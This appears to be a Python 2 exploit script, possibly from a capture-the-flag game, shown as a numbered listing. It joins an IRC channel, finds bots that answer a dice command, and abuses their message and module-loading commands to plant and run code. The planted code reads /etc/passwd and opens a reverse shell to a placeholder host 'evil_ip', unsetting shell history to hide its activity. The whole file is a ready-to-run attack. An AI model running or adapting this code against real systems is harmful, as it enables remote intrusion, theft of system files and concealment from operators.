from socket import *from time import sleepimport refrom random import samp

1. from socket import *
2. from time import sleep
3. import re
4. from random import sample
5.  
6. username = 'exploit'
7. server = '172.16.72.128'
8. port = 6667
9. server_ver = AF_INET#6
10. channel = 'eip'
11.  
12. module_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
13. service_path = '/root/.services_trololololoooo/torqux/' + module_name + '.py'
14. func_name = ''.join(sample('qwertyuiopasdfghjklzxcvbnm', 7))
15. backconnect_host = 'evil_ip'
16. backconnect_port = '1165'
17. backconnect_ver = 'AF_INET6'
18. payload = 'import sys ; import os;import socket;import pty;shell = "/bin/sh";host = "' + backconnect_host + '";port = ' + backconnect_port + ';s = socket.socket(socket.' + backconnect_ver + ',socket.SOCK_STREAM);s.connect((host, port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv("HISTFILE");os.unsetenv("HISTFILESIZE");pid = os.fork();pid or pty.spawn(shell); s.close()'
19.  
20. if __name__ == '__main__':
21.     s = socket(server_ver, SOCK_STREAM)
22.     s.connect((server, port))
23.     s.send('NICK ' + username +'\r\n')
24.     s.send('USER '+ (username + ' ')*3 + ':Python IRC\r\n')
25.     sleep(10)
26.     s.send('JOIN #' + channel + '\r\n')
27.     res = ''
28.     while 'End of MOTD command' not in res:
29.         res += s.recv(100500)
30.     s.send('PRIVMSG #' + channel + ' :!d\r\n')
31.     sleep(4)
32.     res1 = s.recv(100500)
33.     #print res1
34.     bots = []
35.     for l in res1.splitlines():
36.         nicks = re.findall(r'^:([^!]+)!.*? rolls', l)
37.         if nicks:
38.             bots.append(nicks[0])
39.     print 'Found bots:', bots
40.  
41.     for bot in bots:
42.         #bot = '#eip'
43.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
44.         sleep(1)
45.         s.send('PRIVMSG ' + bot + ' :!messages ' + service_path + ' ' + 'def ' + func_name + '(a,b,c,d): a.sendLns(c, open("/etc/passwd").read()[0:100]); ' + payload + '\r\n')
46.         sleep(1)
47.         s.send('PRIVMSG ' + bot + ' :!_makeit 0\r\n')
48.         sleep(1)
49.         s.send('PRIVMSG ' + bot + ' :!_addit ' + module_name + '\r\n')
50.         sleep(1)
51.         s.send('PRIVMSG ' + bot + ' :!reload\r\n')
52.         sleep(1)
53.         s.send('PRIVMSG ' + bot + ' :!' + func_name + '\r\n')
54.         sleep(1)
55.  
56.     if bots:
57.         sleep(1)
58.         print s.recv(100500)
59.     s.close()